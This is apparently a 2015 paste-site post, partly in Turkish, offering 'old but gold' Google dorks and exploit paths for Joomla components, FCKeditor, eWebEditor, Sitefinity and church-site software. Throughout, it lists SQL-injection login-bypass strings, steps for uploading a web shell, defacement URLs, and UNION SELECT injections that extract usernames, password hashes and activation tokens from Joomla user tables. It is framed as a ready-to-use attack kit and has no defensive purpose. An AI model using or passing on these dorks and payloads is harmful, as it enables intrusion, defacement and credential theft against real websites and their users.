Exploit Dorks for Joomla,FCK and others 2015 Old but gold

SUBMITTED BY: rickystewart3
DATE: Sept. 21, 2015, 3:37 a.m.
FORMAT: Text only
SIZE: 3.3 kB
Raw Download
HITS: 733
Report
inurl:”/admin/saveannounce_upload.asp”

inurl:”admin/eWebEditor/Upload.asp”

inurl:”UploadFile/upload.asp”

WEBWİZ ACİGİ (RTE UPLOAD ACIGI ) 

inurl:rte/my_documents/my_files/

inurl:/my_documents/my_files/

exloit: /rte/RTE_popup_file_atch.asp

Editör açığı 

inurl:editor/assetmanager/ (arama kodu geliştirilebilir)

EXPLOİT : /Editor/assetmanager/assetmanager.asp 

Joomla upload açıgı 

inurl index.php?option=com_expose

Exploit: administrator/components/com_expose/uploadimg.php

Uploadin gittigi yer : /components/com_expose/expose/img/

Sitefinity: Login upload açıgı 

inurl:”Sitefinity: Login”

exploit: Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx

Auto Login For Joomla Dork .:old:.

inurl:/administrator/index.php?autologin=1

---

BYPASS ADMIN ACCESS

Dorks:

Code:

inurl:admin.asp

inurl:adminlogin.aspx

inurl:admin/index.php

inurl:administrator.php

inurl:administrator.asp

inurl:login.asp

inurl:login.aspx

inurl:login.php

inurl:admin/index.php

inurl:adminlogin.aspx

Code:

‘ or 1=1 –

1'or’1'=’1

admin’–

” or 0=0 –

or 0=0 –

‘ or 0=0 #

” or 0=0 #

or 0=0 #

‘ or ‘x’='x

” or “x”=”x

‘) or (‘x’='x

‘ or 1=1–

” or 1=1–

or 1=1–

‘ or a=a–

” or “a”=”a

‘) or (‘a’='a

“) or (“a”=”a

hi” or “a”=”a

hi” or 1=1 –

hi’ or 1=1 –

hi’ or ‘a’='a

hi’) or (‘a’='a

----

Joomla Component com_smartformer shell upload

Google Dork inurl:"index.php?option=com_smartformer"

& upload shell.php 

Your shell : 

http://localhost/components/com_smartformer/files/yourshell.php

---

Ministry Web Designing Multiple Vulnerabilities

exploit bypass to login:

user: '=' 'or'

pass: '=' 'or'

Vunlerable Sections:

inurl:/downloadcounter/admin/login.php

inurl:/mediaprogram/admin/index.php

inurl:/churchprogram/login.php

----

(Deface)Exploit (Remote Deface ) Joomla Component

Dork : inurl:index.php?option=com_fabrik

Exploit : /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

---

[Priv8] Joomla Com_content exploit - defacing joomla websites

Dork : 

inurl:index.php?option=com_content & "/mambots/editors/fckeditor"

Vulnerable File :

mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

You can exploit this vulnerable joomla component and deface joomla wesbites and you can also sometimes upload your shell

----

exploit joomla "com_artforms" reset password

Dork : inurl:"option com_artforms"

/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--

/index.php?option=com_user&view=reset

/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users